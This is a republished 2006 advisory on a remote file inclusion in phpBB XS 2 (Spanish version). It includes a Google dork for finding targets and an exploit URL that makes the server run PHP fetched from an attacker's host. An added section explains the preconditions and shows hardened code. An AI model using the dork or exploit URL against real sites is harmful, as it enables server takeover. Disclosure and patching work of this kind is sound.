phpBB XS 2 spain version (phpbb_root_path) Remote File Inclusion

2006.10.03
Risk: High
Local: No
Remote: Yes
CWE: N/A


CVSS Base Score: 5.1/10
Impact Subscore: 6.4/10
Exploitability Subscore: 4.9/10
Exploit range: Remote
Attack complexity: High
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

#############################SolpotCrew Community###############################
#
# phpBB XS 2 spain version (phpbb_root_path) Remote File Inclusion
#
# Download : http://www.elanzuelo.es/phpbb.tar.gz
#
################################################################################
#
# Bug Found By : Solpot a.k.a (k. Hasibuan) (28-09-2006)
#
# contact: chris_hasibuan (at) yahoo (dot) com [email concealed]
#
# Website : http://www.nyubicrew.org/adv/solpot-adv-10.txt
#
################################################################################
#
# Greetz: choi , h4ntu , Ibnusina , r4dja , No-profile , begu , madkid , Noordin`M`TOP
#         robby , Matdhule , setiawan , m3lky , NpR , Fungky , barbarosa
#         home_edition2001 , Rendy , cow_1seng , ^^KaBRuTz , bYu , Lappet-homo
#         Blue|spy , cah|gemblung , Slacky , blind_boy , camagenta , XdikaX
#         x-ace , Dalmet , th3sn0wbr4in , iFX , ^YoGa^ , Soey , vend3r , k1tk4t
#         [K]ompoR_Meledu[K] , Scr3W_W0rM , TOMMY^PENGAMEN , Belaj4r , ^NakKuta
#         and all members of the solpotcrew community @ http://nyubicrew.org/forum/
#         especially thx to str0ke @ milw0rm.com
#
################################################################################

Input passed to the "phpbb_root_path" parameter is not properly verified before being used to include files. This can be exploited to execute arbitrary PHP code by including files from local or external resources.

Code from includes/functions_kb.php:

/***************************************************************************
 *
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation; either version 2 of the License, or
 * (at your option) any later version.
 *
 ***************************************************************************/
//
// get_quick_stats();
// gets number of articles
//
include_once($phpbb_root_path.'includes/functions_color_groups.'.$phpEx);

function get_quick_stats()

The include_once() runs before any check that the file was reached through a phpBB entry script, so a direct request to includes/functions_kb.php evaluates it with whatever $phpbb_root_path holds at that moment. For the query-string value to land in that variable the target must run with register_globals enabled; fetching the remote file additionally needs allow_url_fopen (PHP before 5.2) or allow_url_include (PHP 5.2 and later). The trailing "?" in the exploit URL turns the suffix PHP appends, includes/functions_color_groups.php, into the query string of the request sent to the attacker's host, so that host only has to serve PHP code at its document root.

Google Dork : "Traduccion Espanol por phpBB-Es"

Exploit :
http://somehost/path_to_phpbbXS2/includes/functions_kb.php?phpbb_root_path=http://injek-pala-lappet?

##############################MY LOVE JUST FOR U RIE#############################
######################################E.O.F######################################
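As an added illustration, not code from the advisory or from phpBB XS, the same include is shown below in its vulnerable shape next to a hardened one. The IN_PHPBB guard is phpBB 2's own convention for files under includes/; the kb_safe_root_path() helper, the config.php presence check and the attacker.example host name are assumptions made for this example.

```php
<?php
// Added example, not phpBB XS code. Two shapes of a phpBB-style include file.
// File names functions_kb.php / functions_color_groups.php come from the
// advisory; the attacker.example host is a placeholder for this example.

// --- Vulnerable shape (what the advisory describes) ------------------------
// With register_globals=On, a request such as
//   includes/functions_kb.php?phpbb_root_path=http://attacker.example/?
// assigns $phpbb_root_path before this line runs. With allow_url_fopen
// (PHP < 5.2) or allow_url_include (PHP >= 5.2) enabled, include_once()
// fetches http://attacker.example/?includes/functions_color_groups.php and
// executes whatever the attacker's server returns. Nothing above this line
// checks that a phpBB entry script included this file.
//
//   include_once($phpbb_root_path . 'includes/functions_color_groups.' . $phpEx);

// --- Hardened shape --------------------------------------------------------
// 1. phpBB 2 convention: entry scripts define IN_PHPBB before including
//    anything. A direct request never defines it, so execution stops here,
//    before any include expression is evaluated.
if (!defined('IN_PHPBB')) {
    die('Hacking attempt');
}

// 2. Defence in depth (assumed helper, not part of phpBB): resolve the root
//    path and require a local directory that holds the board's config.php.
//    realpath() returns false for URLs and stream wrappers, so a remote or
//    php:// value can never pass, even if register_globals is still on.
function kb_safe_root_path($root_path)
{
    $real = realpath($root_path);
    if ($real === false
        || !is_dir($real)
        || !is_file($real . DIRECTORY_SEPARATOR . 'config.php')) {
        die('Invalid phpbb_root_path');
    }
    return $real . DIRECTORY_SEPARATOR;
}

// $phpbb_root_path and $phpEx are set by the phpBB entry script that
// included this file; the guard above guarantees that is how we got here.
$phpbb_root_path = kb_safe_root_path($phpbb_root_path);
include_once($phpbb_root_path . 'includes/functions_color_groups.' . $phpEx);
```

The guard alone removes the direct-request vector; the path check is there so that a future direct-access bug or a remaining register_globals deployment still cannot turn the include into a fetch from an attacker's host. Turning register_globals off and leaving allow_url_include off closes the same hole server-wide and should be done regardless of the patch.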


Copyright 2017, cxsecurity.com